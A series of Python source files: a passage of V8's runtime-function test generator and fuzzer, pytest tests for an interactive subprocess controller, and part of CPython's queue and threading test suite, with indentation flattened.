elif ctor_type == 2:
arraylike_name = name + "_arraylike"
result = self._JSObject(arraylike_name, recursion_budget - 1)
length = random.randint(0, 1000)
result.append("try { %s.length = %d; } catch(e) {}" %
(arraylike_name, length))
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, arraylike_name),
fallback="new %sArray(8)" % arraytype))
else:
die = random.random()
buffer_name = name + "_buffer"
args = [buffer_name]
result = self._JSArrayBuffer(buffer_name, recursion_budget)
if die < 0.67:
offset_name = name + "_offset"
args.append(offset_name)
result += self._Int32(offset_name)
if die < 0.33:
length_name = name + "_length"
args.append(length_name)
result += self._Int32(length_name)
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, ", ".join(args)),
fallback="new %sArray(8)" % arraytype))
def _JSArrayBufferView(self, name, recursion_budget):
if random.random() < 0.4:
return self._JSDataView(name, recursion_budget)
else:
return self._JSTypedArray(name, recursion_budget)
def _JSWeakCollection(self, name, recursion_budget):
ctor = random.choice([self._JSMap, self._JSSet])
return ctor(name, recursion_budget, weak="Weak")
def _PropertyDetails(self, name, recursion_budget):
# TODO(jkummerow): Be more clever here?
return self._Int32(name)
def _JSObject(self, name, recursion_budget):
die = random.random()
if die < 0.4:
function = random.choice([self._PlainObject, self._PlainArray,
self._PlainFunction])
elif die < 0.5:
return self._Variable(name, "this") # Global object.
else:
function = random.choice([self._JSArrayBuffer, self._JSDataView,
self._JSDate, self._JSFunctionProxy,
self._JSGeneratorObject, self._JSMap,
self._JSMapIterator, self._JSRegExp,
self._JSSet, self._JSSetIterator,
self._JSTypedArray, self._JSValue,
self._JSWeakCollection])
result = function(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSReceiver(self, name, recursion_budget):
if random.random() < 0.9: return self._JSObject(name, recursion_budget)
return self._JSProxy(name, recursion_budget)
def _HeapObject(self, name, recursion_budget):
die = random.random()
if die < 0.9: return self._JSReceiver(name, recursion_budget)
elif die < 0.95: return self._Oddball(name, recursion_budget)
else: return self._Name(name, recursion_budget)
def _Object(self, name, recursion_budget):
if recursion_budget <= 0:
function = random.choice([self._Oddball, self._Number, self._Name,
self._JSValue, self._JSRegExp])
return function(name, recursion_budget)
if random.random() < 0.2:
return self._Smi(name, recursion_budget)
return self._HeapObject(name, recursion_budget)
GENERATORS = {
"Boolean": ["true", _Boolean],
"HeapObject": ["new Object()", _HeapObject],
"Int32": ["32", _Int32],
"JSArray": ["new Array()", _JSArray],
"JSArrayBuffer": ["new ArrayBuffer(8)", _JSArrayBuffer],
"JSArrayBufferView": ["new Int32Array(2)", _JSArrayBufferView],
"JSDataView": ["new DataView(new ArrayBuffer(24))", _JSDataView],
"JSDate": ["new Date()", _JSDate],
"JSFunction": ["function() {}", _JSFunction],
"JSFunctionProxy": ["Proxy.createFunction({}, function() {})",
_JSFunctionProxy],
"JSGeneratorObject": ["(function*(){ yield 1; })()", _JSGeneratorObject],
"JSMap": ["new Map()", _JSMap],
"JSMapIterator": ["new Map().entries()", _JSMapIterator],
"JSObject": ["new Object()", _JSObject],
"JSProxy": ["Proxy.create({})", _JSProxy],
"JSReceiver": ["new Object()", _JSReceiver],
"JSRegExp": ["/ab/g", _JSRegExp],
"JSSet": ["new Set()", _JSSet],
"JSSetIterator": ["new Set().values()", _JSSetIterator],
"JSTypedArray": ["new Int32Array(2)", _JSTypedArray],
"JSValue": ["new String('foo')", _JSValue],
"JSWeakCollection": ["new WeakMap()", _JSWeakCollection],
"Name": ["\"name\"", _Name],
"Number": ["1.5", _Number],
"Object": ["new Object()", _Object],
"PropertyDetails": ["513", _PropertyDetails],
"SeqOneByteString": ["\"seq 1-byte\"", _SeqString],
"SeqString": ["\"seqstring\"", _SeqString],
"SeqTwoByteString": ["\"seq \\u2082-byte\"", _SeqTwoByteString],
"Smi": ["1", _Smi],
"StrictMode": ["1", _StrictMode],
"String": ["\"foo\"", _String],
"Symbol": ["Symbol(\"symbol\")", _Symbol],
"Uint32": ["32", _Uint32],
}
class ArgParser(object):
def __init__(self, regex, ctor):
self.regex = regex
self.ArgCtor = ctor
class Arg(object):
def __init__(self, typename, varname, index):
self.type = typename
self.name = "_%s" % varname
self.index = index
class Function(object):
def __init__(self, match):
self.name = match.group(1)
self.argslength = -1
self.args = {}
self.inline = ""
handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_HANDLE_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
plain_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
number_handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_NUMBER_ARG_HANDLE_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
smi_arg_parser = ArgParser(
re.compile("^\s*CONVERT_SMI_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Smi", match.group(1), int(match.group(2))))
double_arg_parser = ArgParser(
re.compile("^\s*CONVERT_DOUBLE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
number_arg_parser = ArgParser(
re.compile(
"^\s*CONVERT_NUMBER_CHECKED\(\w+, (\w+), (\w+), args\[(\d+)\]\)"),
lambda match: Arg(match.group(2), match.group(1), int(match.group(3))))
strict_mode_arg_parser = ArgParser(
re.compile("^\s*CONVERT_STRICT_MODE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("StrictMode", match.group(1), int(match.group(2))))
boolean_arg_parser = ArgParser(
re.compile("^\s*CONVERT_BOOLEAN_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Boolean", match.group(1), int(match.group(2))))
property_details_parser = ArgParser(
re.compile("^\s*CONVERT_PROPERTY_DETAILS_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("PropertyDetails", match.group(1), int(match.group(2))))
arg_parsers = [handle_arg_parser, plain_arg_parser, number_handle_arg_parser,
smi_arg_parser,
double_arg_parser, number_arg_parser, strict_mode_arg_parser,
boolean_arg_parser, property_details_parser]
def SetArgsLength(self, match):
self.argslength = int(match.group(1))
def TryParseArg(self, line):
for parser in Function.arg_parsers:
match = parser.regex.match(line)
if match:
arg = parser.ArgCtor(match)
self.args[arg.index] = arg
return True
return False
def Filename(self):
return "%s.js" % self.name.lower()
def __str__(self):
s = [self.name, "("]
argcount = self.argslength
if argcount < 0:
print("WARNING: unknown argslength for function %s" % self.name)
if self.args:
argcount = max([self.args[i].index + 1 for i in self.args])
else:
argcount = 0
for i in range(argcount):
if i > 0: s.append(", ")
s.append(self.args[i].type if i in self.args else "<unknown>")
s.append(")")
return "".join(s)
class Macro(object):
def __init__(self, match):
self.name = match.group(1)
self.args = [s.strip() for s in match.group(2).split(",")]
self.lines = []
self.indentation = 0
self.AddLine(match.group(3))
def AddLine(self, line):
if not line: return
if not self.lines:
# This is the first line, detect indentation.
self.indentation = len(line) - len(line.lstrip())
line = line.rstrip("\\\n ")
if not line: return
assert len(line[:self.indentation].strip()) == 0, \
("expected whitespace: '%s', full line: '%s'" %
(line[:self.indentation], line))
line = line[self.indentation:]
if not line: return
self.lines.append(line + "\n")
def Finalize(self):
for arg in self.args:
pattern = re.compile(r"(##|\b)%s(##|\b)" % arg)
for i in range(len(self.lines)):
self.lines[i] = re.sub(pattern, "%%(%s)s" % arg, self.lines[i])
def FillIn(self, arg_values):
filler = {}
assert len(arg_values) == len(self.args)
for i in range(len(self.args)):
filler[self.args[i]] = arg_values[i]
result = []
for line in self.lines:
result.append(line % filler)
return result
# Parses HEADERFILENAME to find out which runtime functions are "inline".
def FindInlineRuntimeFunctions():
inline_functions = []
with open(HEADERFILENAME, "r") as f:
inline_list = "#define INLINE_FUNCTION_LIST(F) \\\n"
inline_function = re.compile(r"^\s*F\((\w+), \d+, \d+\)\s*\\?")
mode = "SEARCHING"
for line in f:
if mode == "ACTIVE":
match = inline_function.match(line)
if match:
inline_functions.append(match.group(1))
if not line.endswith("\\\n"):
mode = "SEARCHING"
elif mode == "SEARCHING":
if line == inline_list:
mode = "ACTIVE"
return inline_functions
def ReadFileAndExpandMacros(filename):
found_macros = {}
expanded_lines = []
with open(filename, "r") as f:
found_macro = None
for line in f:
if found_macro is not None:
found_macro.AddLine(line)
if not line.endswith("\\\n"):
found_macro.Finalize()
found_macro = None
continue
match = MACRO.match(line)
if match:
found_macro = Macro(match)
if found_macro.name in EXPAND_MACROS:
found_macros[found_macro.name] = found_macro
else:
found_macro = None
continue
match = FIRST_WORD.match(line)
if match:
first_word = match.group(1)
if first_word in found_macros:
MACRO_CALL = re.compile("%s\(([^)]*)\)" % first_word)
match = MACRO_CALL.match(line)
assert match
args = [s.strip() for s in match.group(1).split(",")]
expanded_lines += found_macros[first_word].FillIn(args)
continue
expanded_lines.append(line)
return expanded_lines
# Detects runtime functions by parsing FILENAME.
def FindRuntimeFunctions():
inline_functions = FindInlineRuntimeFunctions()
functions = []
expanded_lines = ReadFileAndExpandMacros(FILENAME)
function = None
partial_line = ""
for line in expanded_lines:
# Multi-line definition support, ignoring macros.
if line.startswith("RUNTIME_FUNCTION") and not line.endswith("{\n"):
if line.endswith("\\\n"): continue
partial_line = line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if partial_line.endswith("{"):
line = partial_line
partial_line = ""
else:
continue
match = FUNCTION.match(line)
if match:
function = Function(match)
if function.name in inline_functions:
function.inline = "_"
continue
if function is None: continue
match = ARGSLENGTH.match(line)
if match:
function.SetArgsLength(match)
continue
if function.TryParseArg(line):
continue
if line == FUNCTIONEND:
if function is not None:
functions.append(function)
function = None
return functions
# Hack: This must have the same fields as class Function above, because the
# two are used polymorphically in RunFuzzer(). We could use inheritance...
class Builtin(object):
def __init__(self, match):
self.name = match.group(1)
args = match.group(2)
self.argslength = 0 if args == "" else args.count(",") + 1
self.inline = ""
self.args = {}
if self.argslength > 0:
args = args.split(",")
for i in range(len(args)):
# a = args[i].strip() # TODO: filter out /* comments */ first.
a = ""
self.args[i] = Arg("Object", a, i)
def __str__(self):
return "%s(%d)" % (self.name, self.argslength)
def FindJSBuiltins():
PATH = "src"
fileslist = []
for (root, dirs, files) in os.walk(PATH):
for f in files:
if f.endswith(".js"):
fileslist.append(os.path.join(root, f))
builtins = []
regexp = re.compile("^function (\w+)\s*\((.*?)\) {")
matches = 0
for filename in fileslist:
with open(filename, "r") as f:
file_contents = f.read()
file_contents = js2c.ExpandInlineMacros(file_contents)
lines = file_contents.split("\n")
partial_line = ""
for line in lines:
if line.startswith("function") and not '{' in line:
partial_line += line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if '{' in line:
line = partial_line
partial_line = ""
else:
continue
match = regexp.match(line)
if match:
builtins.append(Builtin(match))
return builtins
# Classifies runtime functions.
def ClassifyFunctions(functions):
# Can be fuzzed with a JavaScript testcase.
js_fuzzable_functions = []
# We have enough information to fuzz these, but they need inputs that
# cannot be created or passed around in JavaScript.
cctest_fuzzable_functions = []
# This script does not have enough information about these.
unknown_functions = []
types = {}
for f in functions:
if f.name in BLACKLISTED:
continue
decision = js_fuzzable_functions
custom = CUSTOM_KNOWN_GOOD_INPUT.get(f.name, None)
if f.argslength < 0:
# Unknown length -> give up unless there's a custom definition.
if custom and custom[-1] is not None:
f.argslength = custom[-1]
assert len(custom) == f.argslength + 1, \
("%s: last custom definition must be argslength" % f.name)
else:
decision = unknown_functions
else:
if custom:
# Any custom definitions must match the known argslength.
assert len(custom) == f.argslength + 1, \
("%s should have %d custom definitions but has %d" %
(f.name, f.argslength + 1, len(custom)))
for i in range(f.argslength):
if custom and custom[i] is not None:
# All good, there's a custom definition.
pass
elif not i in f.args:
# No custom definition and no parse result -> give up.
decision = unknown_functions
else:
t = f.args[i].type
if t in NON_JS_TYPES:
decision = cctest_fuzzable_functions
else:
assert Generator.IsTypeSupported(t), \
("type generator not found for %s, function: %s" % (t, f))
decision.append(f)
return (js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions)
def _GetKnownGoodArgs(function, generator):
custom_input = CUSTOM_KNOWN_GOOD_INPUT.get(function.name, None)
definitions = []
argslist = []
for i in range(function.argslength):
if custom_input and custom_input[i] is not None:
name = "arg%d" % i
definitions.append("var %s = %s;" % (name, custom_input[i]))
else:
arg = function.args[i]
name = arg.name
definitions += generator.RandomVariable(name, arg.type, simple=True)
argslist.append(name)
return (definitions, argslist)
def _GenerateTestcase(function, definitions, argslist, throws):
s = ["// Copyright 2014 the V8 project authors. All rights reserved.",
"// AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY",
"// Flags: --allow-natives-syntax --harmony"] + definitions
call = "%%%s%s(%s);" % (function.inline, function.name, ", ".join(argslist))
if throws:
s.append("try {")
s.append(call);
s.append("} catch(e) {}")
else:
s.append(call)
testcase = "\n".join(s)
return testcase
def GenerateJSTestcaseForFunction(function):
gen = Generator()
(definitions, argslist) = _GetKnownGoodArgs(function, gen)
testcase = _GenerateTestcase(function, definitions, argslist,
function.name in THROWS)
path = os.path.join(BASEPATH, function.Filename())
with open(path, "w") as f:
f.write("%s\n" % testcase)
def GenerateTestcases(functions):
shutil.rmtree(BASEPATH) # Re-generate everything.
os.makedirs(BASEPATH)
for f in functions:
GenerateJSTestcaseForFunction(f)
def _SaveFileName(save_path, process_id, save_file_index):
return "%s/fuzz_%d_%d.js" % (save_path, process_id, save_file_index)
def _GetFuzzableRuntimeFunctions():
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
return js_fuzzable_functions
FUZZ_TARGET_LISTS = {
"runtime": _GetFuzzableRuntimeFunctions,
"builtins": FindJSBuiltins,
}
def RunFuzzer(process_id, options, stop_running):
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.001
SLEEP_TIME_FACTOR = 1.25
base_file_name = "/dev/shm/runtime_fuzz_%d" % process_id
test_file_name = "%s.js" % base_file_name
stderr_file_name = "%s.out" % base_file_name
save_file_index = 0
while os.path.exists(_SaveFileName(options.save_path, process_id,
save_file_index)):
save_file_index += 1
targets = FUZZ_TARGET_LISTS[options.fuzz_target]()
try:
for i in range(options.num_tests):
if stop_running.is_set(): break
function = None
while function is None or function.argslength == 0:
function = random.choice(targets)
args = []
definitions = []
gen = Generator()
for i in range(function.argslength):
arg = function.args[i]
argname = "arg%d%s" % (i, arg.name)
args.append(argname)
definitions += gen.RandomVariable(argname, arg.type, simple=False)
testcase = _GenerateTestcase(function, definitions, args, True)
with open(test_file_name, "w") as f:
f.write("%s\n" % testcase)
with open("/dev/null", "w") as devnull:
with open(stderr_file_name, "w") as stderr:
process = subprocess.Popen(
[options.binary, "--allow-natives-syntax", "--harmony",
"--enable-slow-asserts", test_file_name],
stdout=devnull, stderr=stderr)
end_time = time.time() + options.timeout
timed_out = False
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
os.kill(process.pid, signal.SIGTERM)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
if exit_code != 0 and not timed_out:
oom = False
with open(stderr_file_name, "r") as stderr:
for line in stderr:
if line.strip() == "# Allocation failed - process out of memory":
oom = True
break
if oom: continue
save_name = _SaveFileName(options.save_path, process_id,
save_file_index)
shutil.copyfile(test_file_name, save_name)
save_file_index += 1
except KeyboardInterrupt:
stop_running.set()
finally:
if os.path.exists(test_file_name):
os.remove(test_file_name)
if os.path.exists(stderr_file_name):
os.remove(stderr_file_name)
def BuildOptionParser():
usage = """Usage: %%prog [options] ACTION
where ACTION can be:
info Print diagnostic info.
check Check that runtime functions can be parsed as expected, and that
test cases exist.
generate Parse source code for runtime functions, and auto-generate
test cases for them. Warning: this will nuke and re-create
%(path)s.
fuzz Generate fuzz tests, run them, save those that crashed (see options).
""" % {"path": os.path.relpath(BASEPATH)}
o = optparse.OptionParser(usage=usage)
o.add_option("--binary", default="out/x64.debug/d8",
help="d8 binary used for running fuzz tests (default: %default)")
o.add_option("--fuzz-target", default="runtime",
help="Set of functions targeted by fuzzing. Allowed values: "
"%s (default: %%default)" % ", ".join(FUZZ_TARGET_LISTS))
o.add_option("-n", "--num-tests", default=1000, type="int",
help="Number of fuzz tests to generate per worker process"
" (default: %default)")
o.add_option("--save-path", default="~/runtime_fuzz_output",
help="Path to directory where failing tests will be stored"
" (default: %default)")
o.add_option("--timeout", default=20, type="int",
help="Timeout for each fuzz test (in seconds, default:"
"%default)")
return o
def ProcessOptions(options, args):
options.save_path = os.path.expanduser(options.save_path)
if options.fuzz_target not in FUZZ_TARGET_LISTS:
print("Invalid fuzz target: %s" % options.fuzz_target)
return False
if len(args) != 1 or args[0] == "help":
return False
return True
def Main():
parser = BuildOptionParser()
(options, args) = parser.parse_args()
if not ProcessOptions(options, args):
parser.print_help()
return 1
action = args[0]
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
builtins = FindJSBuiltins()
if action == "test":
print("put your temporary debugging code here")
return 0
if action == "info":
print("%d functions total; js_fuzzable_functions: %d, "
"cctest_fuzzable_functions: %d, unknown_functions: %d"
% (len(functions), len(js_fuzzable_functions),
len(cctest_fuzzable_functions), len(unknown_functions)))
print("%d JavaScript builtins" % len(builtins))
print("unknown functions:")
for f in unknown_functions:
print(f)
return 0
if action == "check":
errors = 0
def CheckCount(actual, expected, description):
if len(actual) != expected:
print("Expected to detect %d %s, but found %d." % (
expected, description, len(actual)))
print("If this change is intentional, please update the expectations"
" at the top of %s." % THIS_SCRIPT)
return 1
return 0
errors += CheckCount(functions, EXPECTED_FUNCTION_COUNT,
"functions in total")
errors += CheckCount(js_fuzzable_functions, EXPECTED_FUZZABLE_COUNT,
"JavaScript-fuzzable functions")
errors += CheckCount(cctest_fuzzable_functions, EXPECTED_CCTEST_COUNT,
"cctest-fuzzable functions")
errors += CheckCount(unknown_functions, EXPECTED_UNKNOWN_COUNT,
"functions with incomplete type information")
errors += CheckCount(builtins, EXPECTED_BUILTINS_COUNT,
"JavaScript builtins")
def CheckTestcasesExisting(functions):
errors = 0
for f in functions:
if not os.path.isfile(os.path.join(BASEPATH, f.Filename())):
print("Missing testcase for %s, please run '%s generate'" %
(f.name, THIS_SCRIPT))
errors += 1
files = filter(lambda filename: not filename.startswith("."),
os.listdir(BASEPATH))
if (len(files) != len(functions)):
unexpected_files = set(files) - set([f.Filename() for f in functions])
for f in unexpected_files:
print("Unexpected testcase: %s" % os.path.join(BASEPATH, f))
errors += 1
print("Run '%s generate' to automatically clean these up."
% THIS_SCRIPT)
return errors
errors += CheckTestcasesExisting(js_fuzzable_functions)
def CheckNameClashes(runtime_functions, builtins):
errors = 0
runtime_map = {}
for f in runtime_functions:
runtime_map[f.name] = 1
for b in builtins:
if b.name in runtime_map:
print("Builtin/Runtime_Function name clash: %s" % b.name)
errors += 1
return errors
errors += CheckNameClashes(functions, builtins)
if errors > 0:
return 1
print("Generated runtime tests: all good.")
return 0
if action == "generate":
GenerateTestcases(js_fuzzable_functions)
return 0
if action == "fuzz":
processes = []
if not os.path.isdir(options.save_path):
os.makedirs(options.save_path)
stop_running = multiprocessing.Event()
for i in range(multiprocessing.cpu_count()):
args = (i, options, stop_running)
p = multiprocessing.Process(target=RunFuzzer, args=args)
p.start()
processes.append(p)
try:
for i in range(len(processes)):
processes[i].join()
except KeyboardInterrupt:
stop_running.set()
for i in range(len(processes)):
processes[i].join()
return 0
if __name__ == "__main__":
sys.exit(Main())
|
test_interactive.py
|
import time
from threading import Thread
import pytest
from pji.control import interactive_process, ResourceLimit, InteractiveProcess, RunResultStatus
# noinspection DuplicatedCode
@pytest.mark.unittest
class TestControlProcessInteractive:
def test_interactive_process_simple(self):
_before_start = time.time()
with interactive_process(
args="echo 233 && sleep 2 && echo 2334",
shell=True,
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
time.sleep(0.5)
assert _output == [b'233']
time.sleep(3)
assert _output == [b'233', b'2334']
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_with_env(self):
_before_start = time.time()
with interactive_process(
args="echo 233 && sleep 2 && echo ${ENV_TEST}",
shell=True,
environ={'ENV_TEST': '2334'},
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
time.sleep(0.5)
assert _output == [b'233']
time.sleep(3)
assert _output == [b'233', b'2334']
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_with_input(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'}
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(1.0)
assert _output == [b'233']
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233', b'233jsdf']
assert ip.result.result is None
assert ip.status == RunResultStatus.NOT_COMPLETED
assert not ip.ok
assert not ip.completed
ip.close_stdin()
ip.join()
_result = ip.result.result
assert ip.ok
assert ip.completed
assert ip.status == RunResultStatus.SUCCESS
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_rtle(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'},
resources=ResourceLimit(
max_real_time='2s',
)
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(2.0)
assert _output == [b'233']
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 9
def test_interactive_process_rtle_pass(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'},
resources=ResourceLimit(
max_real_time='4s',
)
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(2.0)
assert _output == [b'233']
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233', b'233jsdf']
assert ip.result.result is None
assert ip.result.status == RunResultStatus.NOT_COMPLETED
assert not ip.ok
assert not ip.completed
ip.close_stdin()
ip.join()
_result = ip.result.result
assert ip.ok
assert ip.completed
assert ip.status == RunResultStatus.SUCCESS
assert _result.ok
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
@pytest.mark.timeout(5.0)
def test_interactive_process_direct_close_1(self):
with interactive_process(
args="sh",
) as ip:
assert isinstance(ip, InteractiveProcess)
ip.print_stdin(b'echo 233')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'233'
ip.print_stdin(b'echo 2334')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'2334'
_result = ip.result.result
assert _result.ok
@pytest.mark.timeout(5.0)
def test_interactive_process_direct_close_2(self):
with interactive_process(
args="sh",
) as ip:
assert isinstance(ip, InteractiveProcess)
ip.print_stdin(b'echo 233')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'233'
ip.print_stdin(b'echo 2334')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'2334'
ip.close_stdin()
_result = ip.result.result
assert _result.ok
def test_interactive_process_wtf(self):
with pytest.raises(EnvironmentError):
with interactive_process(
args="what_the_fuck -c 'echo 233 && sleep 2 && echo 2334'",
):
pytest.fail('Should not reach here')
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import queue
import time
import unittest
from test import support
threading = support.import_module('threading')
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def tearDown(self):
self.t = None
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
